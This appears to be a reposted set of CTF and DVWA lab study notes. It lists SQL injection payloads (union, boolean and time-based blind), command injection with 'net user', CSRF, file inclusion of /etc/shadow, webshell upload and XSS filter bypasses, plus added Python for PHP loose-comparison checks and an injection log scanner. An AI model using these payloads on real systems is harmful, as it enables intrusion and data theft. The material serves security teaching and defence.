ctf notes 19.5.3-19.8.11

Knowledge picked up from all kinds of CTF practice, mostly web security.

ffifdyop: its MD5 digest (as raw bytes) reassembles the SQL into the equivalent of $sql = "select password from users where password = '' or '<xxx>'", bypassing md5()-based password checks.
Image steganography tips: check txt and gif files; an image may contain swappable layers, view them in PS (Photoshop).
document.cookie = "cookiename=cookievalue" changes a cookie.
Seeing "._" usually means Morse code.
Base64 uses A-Z, a-z, 0-9, + /;
Base32 uses A-Z, 2-7;
Base16 (hex) uses 0-9, A-F.
Base encodings pad with '=' when the digit count falls short, so a trailing '=' suggests trying a Base decode.
Seeing "%number" means URL encoding; decode it.
Seeing "&#number;" means HTML numeric entity (Unicode code point) encoding.
Only "[]()!" appearing means JSFuck encoding.
Only "><+-,[]." appearing means Brainfuck encoding.
---
MySQL numeric injection summary:
Error echo:
' 1=1 1=2 to determine whether injection is possible
order by N to find the number of fields
and 1=2 union select 1,2,3...N to see which positions echo normally; data is displayed through the positions that echo normally
and 1=2 union select database(),version() to check the database name and version
and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# (2 fields) look up table names
and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'# (2 fields) look up column names
and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database() (4 fields) look up table names; like can be replaced with =
and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin' (4 fields) look up column names
and 1=2 union select group_concat(username,'-',password) from admin# (2 fields) read field values
and 1=2 union select table_name from information_schema.tables where table_schema=database() limit N,1 to query tables one at a time
and 1=2 union select 1,SCHEMA_NAME,3,4 from information_schema.SCHEMATA limit 0,1 to look up databases from information_schema
Note: in the examples, positions 2 and 3 echo normally while 1 and 4 do not. "and 1=2" can be replaced with id=-1, i.e. an error state, so that the statement's result lands in a normally echoing position.
---
Username SQL injection: ' or 1=1-- i.e. the universal password.
---
Non-error echo:
' union select group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1   there is a ' in front and '1'='1 at the end; otherwise similar to the error-echo case
---
Hashes beginning with 0e (the PHP hash of these usernames is 0exxx):
240610708 == 0e462097431906509019562988736854
QNKCDZO == 0e83040045199349405802421990339
aabg7XSs == 0e087386482136013740957780965295
aabC9RqS == 0e041022518165728065344349536299
Deserialization construction: a = array; i = int; s = string (a Chinese character counts as 3 units, a letter or digit as 1); b = boolean;
a:2:{s:4:"user";b:1;s:4:"pass";b:1;} guarantees $data_unserialize['pass']=='???' where ? is unknown
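Why both tricks above work is PHP's loose comparison (==). The following is an added example, not part of the original notes: it emulates the two cases of == that matter here (numeric strings such as 0e... digests, and a boolean against a string), shows the strict comparison that closes the hole, and builds serialize() strings using the UTF-8 byte-length rule for s:. Function names are my own.

```python
import hashlib
import hmac
import re

# PHP treats a string as numeric if it matches this pattern (sign, digits,
# optional fraction and exponent); "0e123..." therefore parses as 0 * 10**123 == 0.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def php_loose_eq(a, b):
    """Subset of PHP '==' (type juggling): bool vs anything, numeric strings."""
    if isinstance(a, bool) or isinstance(b, bool):
        # The other side is cast to bool: "", "0", 0, null are false, all else true.
        def truthy(v):
            return v not in (False, 0, "", "0", None)
        return truthy(a) == truthy(b)
    if isinstance(a, str) and isinstance(b, str) and _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)  # two numeric strings compare as numbers
    return a == b

def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()

def is_magic_hash(hex_digest):
    """A digest that is '0e' followed only by digits equals 0 under '=='."""
    return re.fullmatch(r"0e\d+", hex_digest) is not None

def strict_eq(a, b):
    """The fix: hash_equals()/'===' style comparison, no type juggling."""
    return isinstance(a, str) and isinstance(b, str) and hmac.compare_digest(a, b)

def php_serialize(v):
    """Minimal PHP serialize(): bool, int, str (UTF-8 byte length), list/dict."""
    if isinstance(v, bool):
        return "b:%d;" % int(v)
    if isinstance(v, int):
        return "i:%d;" % v
    if isinstance(v, str):
        return 's:%d:"%s";' % (len(v.encode("utf-8")), v)  # one Chinese char -> 3 bytes
    if isinstance(v, list):
        v = dict(enumerate(v))
    if isinstance(v, dict):
        body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return "a:%d:{%s}" % (len(v), body)
    raise TypeError("unsupported type: %s" % type(v).__name__)

if __name__ == "__main__":
    h1, h2 = md5_hex("240610708"), md5_hex("QNKCDZO")
    print(h1, h2, php_loose_eq(h1, h2), strict_eq(h1, h2))
    print(php_serialize({"user": True, "pass": True}))
```

The same type juggling is why b:1 in the serialized array compares equal to any non-empty string other than "0"; a check written with === or hash_equals() is not fooled.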
---
DVWA series
MySQL injection
Construct statements such as:
1' or '1'='1
1' union select XXX

Brute Force
burp -> send to intruder -> attack
universal password

Command injection
ping 127.0.0.1 & net user
The command after && or & is the attack command
Bypassing filters: ping 127.0.0.1 &;& net user
127.0.0.1|net user   | is the pipe symbol: the output of the preceding command becomes the input of the following one, and only the latter's output is shown

CSRF (cross-site request forgery)
Example: http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change#
Here ?password_new=hacked&password_conf=hacked&Change=Change# is the CSRF attack, i.e. it changes the password to hacked
This can be combined with short links or a forged page that loads the URL as an image (img src); naming the page after the victim's IP can bypass Referer filtering

File Inclusion
Examples:
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=/etc/shadow   use this first to probe whether the host is Linux; if not, the error leaks the absolute path of server files
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=F:\XAMPP\htdocs\dvwa\php.ini   absolute-path probe
..\..\..\..\..\..\..\..\..\xampp\htdocs\dvwa\php.ini   relative path
http://192.168.5.12/phpinfo.txt   remote file inclusion; if filtered, it can be written as htthttp://p: and the like, optionally URL-encoded for stealth, at the cost of a higher chance of failure
file:///C:\Users\shadow\Desktop\hack.txt   local file inclusion; after uploading a file, the file protocol completes the attack

File Upload
Upload a webshell and connect with Caidao (China Chopper)
Image shell: upload it, then 1. use file inclusion with page=http:xxx and connect Caidao to that address
2. capture the request in burp, change filename, connect with Caidao
3. when magic_quotes_gpc=off, rename the image shell to xxx.php%00.png (%00 is the URL encoding of \0)
4. merge the image and the shell with the copy command, connect Caidao with page=file:\\\xxx

Insecure CAPTCHA
Capture the request in burp and change the parameters, or construct a CSRF

SQL injection
Similar to before; when there is no input field, capture the request in burp to supply input
If keywords are escaped, hex encoding can bypass it; note that hexadecimal is written as 0xnumber

SQL Injection (Blind)
Note: string-type injection is used as the example here; numeric-type injection does not need the '
Boolean-based
1' and 1=1# 1' and 1=2# detect boolean-based blind injection
1' and length(database())=1# ... =n check the database name length; = can also be changed to a comparison operator for binary search
1' and ascii(substr(database(),1,1))>97 and ascii(substr(database(),n,1))<122# guess the database name character by character with binary search
1' and (select count(*) from information_schema.tables where table_schema=database())=n# guess the number of tables; * can be written as table_name
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit n,1),1))=1# get the table name length, n is which table
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit n,1),m,1))>97# get the table name by binary search as before; n (from 0, in limit n,1) is which table, m (from 1, in substr) is which character
1' and (select count(column_name) from information_schema.columns where table_name='users')=1# ...=n get the number of columns
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1# get the column name length
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>97# same as before
Note: this is like ordinary SQL injection, except length()=n judges length, select count judges counts and ascii(substr()) judges names
Time-based
1' and sleep(5)# there is a delay
1 and sleep(5) # no delay
Together these show a string-type time-based blind injection exists
1' and if(length(database())=1,sleep(5),1)# ... 1' and if(length(database())=n,sleep(5),1)# get the length
1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)# get the name
Like the boolean-based case, only wrapped in if(xxx,sleep(5),1)
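Seen from the server side, the union, boolean and time-based payloads in the two injection sections above leave recognisable shapes in the access log. The following is an added example, not from the original notes: it URL-decodes the query string of each log line and classifies it by the patterns used above (sleep()/if(...sleep...), union select, and 1=1/1=2, ascii(substr()), length(), information_schema). Log lines are constructed for the demo; rule names and regexes are my own.

```python
import re
from urllib.parse import unquote_plus

# (rule name, regex applied to the decoded query string, attack family)
RULES = [
    ("sleep_call",   re.compile(r"\b(sleep|benchmark)\s*\(", re.I), "time"),
    ("cond_sleep",   re.compile(r"\bif\s*\(.*\bsleep\s*\(", re.I), "time"),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I), "union"),
    ("tautology",    re.compile(r"\b(and|or)\s+1\s*=\s*[12]\b", re.I), "boolean"),
    ("char_probe",   re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I), "boolean"),
    ("length_probe", re.compile(r"\blength\s*\(", re.I), "boolean"),
    ("schema_read",  re.compile(r"\binformation_schema\.", re.I), "boolean"),
]
PRIORITY = ["time", "union", "boolean"]  # report the most specific family first

# Common/combined log format: ip ident user [time] "METHOD path HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def classify_query(query):
    """Return (family, [rule names]) for one already-decoded query string."""
    hits = [(name, fam) for name, rx, fam in RULES if rx.search(query)]
    families = {fam for _, fam in hits}
    for fam in PRIORITY:
        if fam in families:
            return fam + "-based", [name for name, _ in hits]
    return "benign", []

def scan_log(lines):
    """Yield (client_ip, family, rule names) for each request that trips a rule."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log entry
        ip, path, _status = m.groups()
        query = unquote_plus(path.partition("?")[2])  # decode %XX and '+'
        family, hits = classify_query(query)
        if family != "benign":
            yield ip, family, hits

# Constructed sample lines (not real traffic); payload shapes follow the notes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 1200',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+length%28database%28%29%29%3D4%23&Submit=Submit HTTP/1.1" 200 1200',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+if%28ascii%28substr%28database%28%29%2C1%2C1%29%29%3E97%2Csleep%285%29%2C1%29%23&Submit=Submit HTTP/1.1" 200 1200',
    '10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /dvwa/vulnerabilities/sqli/?id=-1+union+select+1%2Cgroup_concat%28table_name%29+from+information_schema.tables%23&Submit=Submit HTTP/1.1" 200 1500',
]
```

Running `list(scan_log(SAMPLE_LOG))` flags the three payload requests as boolean-, time- and union-based and leaves the plain id=1 request alone; on a real log the time-based hits are the ones worth correlating with response-time spikes.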

XSS (cross-site scripting)
Reflected XSS
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(/xss/)</script>#
Here <script>alert(/xss/)</script> is the attack statement
Bypass by doubling: if <script> is blocked, write <scr<script>ipt>alert(/xss/)</script>#
Or mix upper and lower case: with <script> blocked, write <Script>alert(/xss/)</script>#
Image form: <img src=1 onerror=alert(/xss/)> where alert(/xss/) is the attack statement
Stored XSS
Find an input location such as an input field and write the attack statement; otherwise the same as above
If there is a length limit, capture the request in burp and modify it
Bypasses are the same as above
XSS trigger: <input value="xxx &#34;onchange=xxx()&#34;"> where &#34; is the ASCII code (entity) for "; can be combined with CSRF

Origin www.cnblogs.com/5h4d0w/p/11432726.html